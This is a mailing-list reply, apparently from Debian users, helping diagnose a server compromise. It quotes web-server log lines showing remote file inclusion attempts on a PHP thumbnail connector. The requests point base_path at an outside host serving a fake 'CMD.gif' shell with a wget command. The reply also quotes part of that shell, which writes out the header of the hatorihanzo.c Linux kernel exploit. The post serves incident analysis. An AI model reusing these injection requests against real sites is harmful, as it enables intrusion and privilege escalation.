Re: ***DEB*: Re: help needed

[Fuzzums]

213.215.135.124 - - [03/Nov/2006:17:26:03 +0100] "GET 
http://85.214.18.193/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://213.202.214.106/CMD.gif?&cmd=wget
 HTTP/1.0" 403 495 
"http://85.214.18.193/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://213.202.214.106/CMD.gif?&cmd=wget";
 "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
213.215.135.124 - - [03/Nov/2006:17:26:03 +0100] "GET 
http://85.214.18.193/cms/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://213.202.214.106/CMD.gif?&cmd=wget
 HTTP/1.0" 403 499 
"http://85.214.18.193/cms/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://213.202.214.106/CMD.gif?&cmd=wget";
 "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

http://213.202.214.106/CMD.gif isn't a gif.

[snip]

if ($kernel == "write") {
   $kernel = "/*\n" .
             " * hatorihanzo.c\n" .
             " * Linux kernel do_brk vma overflow exploit.\n" .
             " *\n" .
             " * The bug was found by Paul (IhaQueR) Starzetz <[EMAIL 
PROTECTED]>\n" .
             " *\n" .
             " * Further research and exploit development by\n" .
             " * Wojciech Purczynski <[EMAIL PROTECTED]> and Paul Starzetz.\n" .
             " *\n" .
             " * (c) 2003 Copyright by IhaQueR and cliph. All Rights 
Reserved.\n" .
             " *\n" .
             " * COPYING, PRINTING, DISTRIBUTION, MODIFICATION, COMPILATION AND ANY 
USE\n" .
             " * OF PRESENTED CODE IS STRICTLY PROHIBITED.\n" .

[/snip]

I think this will give you an idea of what happened.


--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]